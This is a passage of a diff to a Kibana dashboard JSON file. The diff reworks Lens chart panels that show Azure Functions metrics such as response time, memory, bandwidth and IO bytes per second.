"axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bde63578-63d7-43ab-ad04-0b810b2f4033" + ], + "layerId": "8d0f0cfa-b115-4100-ba7e-1cadee108055", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": 
"ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", + "xAccessor": "234483e9-2403-442e-bb76-d6315e2517af" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The time taken for the app to serve requests.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8d0f0cfa-b115-4100-ba7e-1cadee108055", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The time taken for the app to serve requests.", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "5ef0d281-2eff-415a-ac37-d778985db835", + "w": 24, + "x": 0, + "y": 29 + }, + "panelIndex": "5ef0d281-2eff-415a-ac37-d778985db835", + "title": "Averave Response Time(in seconds)", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The current amount of memory used by the app. 
", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "750303c4-2d5f-4b67-8018-cba6ccc3e3f8": { + "columnOrder": [ + "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", + "03e43362-ec04-4c0a-8cdf-0bd29107feee", + "1d2a33f9-47f5-4483-bd25-bf258b7fe434" + ], + "columns": { + "03e43362-ec04-4c0a-8cdf-0bd29107feee": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "1d2a33f9-47f5-4483-bd25-bf258b7fe434": { + "dataType": "number", + "isBucketed": false, + "label": "Average of azure.functions.average_memory_working_set.avg", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "8d0f0cfa-b115-4100-ba7e-1cadee108055": { - "columnOrder": [ - "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", - "234483e9-2403-442e-bb76-d6315e2517af", - "bde63578-63d7-43ab-ad04-0b810b2f4033" - ], - "columns": { - "234483e9-2403-442e-bb76-d6315e2517af": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": 
"bde63578-63d7-43ab-ad04-0b810b2f4033", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "bde63578-63d7-43ab-ad04-0b810b2f4033": { - "dataType": "number", - "isBucketed": false, - "label": "Average of azure.functions.http_response_time.avg", - "operationType": "average", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http_response_time.avg" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.average_memory_working_set.avg" + }, + "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1d2a33f9-47f5-4483-bd25-bf258b7fe434", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "bde63578-63d7-43ab-ad04-0b810b2f4033" - ], - "layerId": "8d0f0cfa-b115-4100-ba7e-1cadee108055", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", - "xAccessor": "234483e9-2403-442e-bb76-d6315e2517af" - } - ], - "legend": { - "isVisible": true, - 
"position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The time taken for the app to serve requests.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "5ef0d281-2eff-415a-ac37-d778985db835", - "w": 24, - "x": 0, - "y": 29 - }, - "panelIndex": "5ef0d281-2eff-415a-ac37-d778985db835", - "title": "Averave Response Time(in seconds)", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1d2a33f9-47f5-4483-bd25-bf258b7fe434" + ], + "layerId": "750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", + "xAccessor": "03e43362-ec04-4c0a-8cdf-0bd29107feee" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The current amount of memory used by the app. 
", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "750303c4-2d5f-4b67-8018-cba6ccc3e3f8": { - "columnOrder": [ - "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", - "03e43362-ec04-4c0a-8cdf-0bd29107feee", - "1d2a33f9-47f5-4483-bd25-bf258b7fe434" - ], - "columns": { - "03e43362-ec04-4c0a-8cdf-0bd29107feee": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "1d2a33f9-47f5-4483-bd25-bf258b7fe434": { - "dataType": "number", - "isBucketed": false, - "label": "Average of azure.functions.average_memory_working_set.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.average_memory_working_set.avg" - }, - "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "1d2a33f9-47f5-4483-bd25-bf258b7fe434", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The current amount of memory used by the app. 
", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4f589bdd-7bbf-4b5e-88f7-68272155780d", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "4f589bdd-7bbf-4b5e-88f7-68272155780d", + "title": "Memory Working Set by Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "description": "The amount of incoming bandwidth consumed by the app. ", + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5e26da41-85b9-4f3d-b666-9b027f19f4c0": { + "columnOrder": [ + "e3e826ac-4145-4caa-97c7-0074740c3bde", + "4d55692b-10e3-4d58-8bc0-2973e9d8bd58", + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" + ], + "columns": { + "4d55692b-10e3-4d58-8bc0-2973e9d8bd58": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e3e826ac-4145-4caa-97c7-0074740c3bde": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f807ce10-f26f-4f0a-a838-2baea3bb5ac2", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - 
"accessors": [ - "1d2a33f9-47f5-4483-bd25-bf258b7fe434" - ], - "layerId": "750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", - "xAccessor": "03e43362-ec04-4c0a-8cdf-0bd29107feee" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The current amount of memory used by the app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "4f589bdd-7bbf-4b5e-88f7-68272155780d", - "w": 24, - "x": 24, - "y": 29 - }, - "panelIndex": "4f589bdd-7bbf-4b5e-88f7-68272155780d", - "title": "Memory Working Set by Function Apps", - "type": "lens", - "version": "8.7.1" - }, - { - "embeddableConfig": { - "description": "The amount of incoming bandwidth consumed by the app. 
", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "96b12503-3f63-4f80-9419-f8d25b7356fc", - "w": 24, - "x": 0, - "y": 44 - }, - "panelIndex": "96b12503-3f63-4f80-9419-f8d25b7356fc", - "panelRefName": "panel_96b12503-3f63-4f80-9419-f8d25b7356fc", - "title": "Top 10 Function Apps by Bytes Received ", - "type": "lens", - "version": "8.7.1" + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.bytes_received.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "azure.functions.bytes_received.total" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.function\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" + ], + "layerId": "5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "e3e826ac-4145-4caa-97c7-0074740c3bde", + "xAccessor": "4d55692b-10e3-4d58-8bc0-2973e9d8bd58" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The amount of outgoing bandwidth sent by the app. 
", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", - "type": "index-pattern" + "title": "Bytes Received", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 15, + "i": "96b12503-3f63-4f80-9419-f8d25b7356fc", + "w": 24, + "x": 0, + "y": 44 + }, + "panelIndex": "96b12503-3f63-4f80-9419-f8d25b7356fc", + "title": "Top 10 Function Apps by Bytes Received ", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The amount of outgoing bandwidth sent by the app. ", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa95f5df-3ddf-44ed-88b8-793641935e0a": { + "columnOrder": [ + "a3174d15-f56d-4533-b4e8-2006a55c51d4", + "4a76dd12-cd30-4e95-8b20-015379b31cf4", + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" + ], + "columns": { + "4a76dd12-cd30-4e95-8b20-015379b31cf4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.bytes_sent.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "fa95f5df-3ddf-44ed-88b8-793641935e0a": { - "columnOrder": [ - "a3174d15-f56d-4533-b4e8-2006a55c51d4", - 
"4a76dd12-cd30-4e95-8b20-015379b31cf4", - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" - ], - "columns": { - "4a76dd12-cd30-4e95-8b20-015379b31cf4": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.bytes_sent.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.bytes_sent.total" - }, - "a3174d15-f56d-4533-b4e8-2006a55c51d4": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "6d32a3d7-e8d2-4061-9d93-eeca1d25d957", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.bytes_sent.total" + }, + "a3174d15-f56d-4533-b4e8-2006a55c51d4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6d32a3d7-e8d2-4061-9d93-eeca1d25d957", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + 
"orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" - ], - "layerId": "fa95f5df-3ddf-44ed-88b8-793641935e0a", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "a3174d15-f56d-4533-b4e8-2006a55c51d4", - "xAccessor": "4a76dd12-cd30-4e95-8b20-015379b31cf4" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The amount of outgoing bandwidth sent by the app. 
", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "578f6fe3-6edb-4678-b13c-1e9510f1942b", - "w": 24, - "x": 24, - "y": 44 - }, - "panelIndex": "578f6fe3-6edb-4678-b13c-1e9510f1942b", - "title": "Top 10 Function Apps by Bytes Sent ", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" + ], + "layerId": "fa95f5df-3ddf-44ed-88b8-793641935e0a", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "a3174d15-f56d-4533-b4e8-2006a55c51d4", + "xAccessor": "4a76dd12-cd30-4e95-8b20-015379b31cf4" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is reading bytes from I/O operation", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The amount of outgoing bandwidth sent by the app. 
", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "578f6fe3-6edb-4678-b13c-1e9510f1942b", + "w": 24, + "x": 24, + "y": 44 + }, + "panelIndex": "578f6fe3-6edb-4678-b13c-1e9510f1942b", + "title": "Top 10 Function Apps by Bytes Sent ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is reading bytes from I/O operation", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0": { + "columnOrder": [ + "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", + "10d4106f-6c96-4dc2-8866-3f1fe7e81898", + "755983df-cc70-41bc-88d7-56ae24060492" + ], + "columns": { + "10d4106f-6c96-4dc2-8866-3f1fe7e81898": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "755983df-cc70-41bc-88d7-56ae24060492": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_read_bytes_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0": { - "columnOrder": [ - "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", - "10d4106f-6c96-4dc2-8866-3f1fe7e81898", - "755983df-cc70-41bc-88d7-56ae24060492" - ], - "columns": { - "10d4106f-6c96-4dc2-8866-3f1fe7e81898": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - 
"includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "755983df-cc70-41bc-88d7-56ae24060492": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_read_bytes_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_read_bytes_per_second.total" - }, - "d3c92de9-3de0-4478-a4a6-432e2c42c0ab": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "755983df-cc70-41bc-88d7-56ae24060492", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_read_bytes_per_second.total" + }, + "d3c92de9-3de0-4478-a4a6-432e2c42c0ab": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "755983df-cc70-41bc-88d7-56ae24060492", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - 
"gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "755983df-cc70-41bc-88d7-56ae24060492" - ], - "layerId": "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", - "xAccessor": "10d4106f-6c96-4dc2-8866-3f1fe7e81898" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is reading bytes from I/O operation", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f7c59600-cc99-4d51-b8f8-20976818476a", - "w": 24, - "x": 0, - "y": 59 - }, - "panelIndex": "f7c59600-cc99-4d51-b8f8-20976818476a", - "title": "IO Read Bytes Per Second", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "755983df-cc70-41bc-88d7-56ae24060492" + ], + "layerId": "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + 
"splitAccessor": "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", + "xAccessor": "10d4106f-6c96-4dc2-8866-3f1fe7e81898" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is writing bytes to I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is reading bytes from I/O operation", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "f7c59600-cc99-4d51-b8f8-20976818476a", + "w": 24, + "x": 0, + "y": 59 + }, + "panelIndex": "f7c59600-cc99-4d51-b8f8-20976818476a", + "title": "IO Read Bytes Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is writing bytes to I/O operations.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5": { + "columnOrder": [ + "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", + "e2344323-fc84-49dc-9a63-ff7cc0ac618a", + "017dace0-c878-45e7-8d98-bfba5bdade86" + ], + "columns": { + "017dace0-c878-45e7-8d98-bfba5bdade86": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_write_bytes_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - 
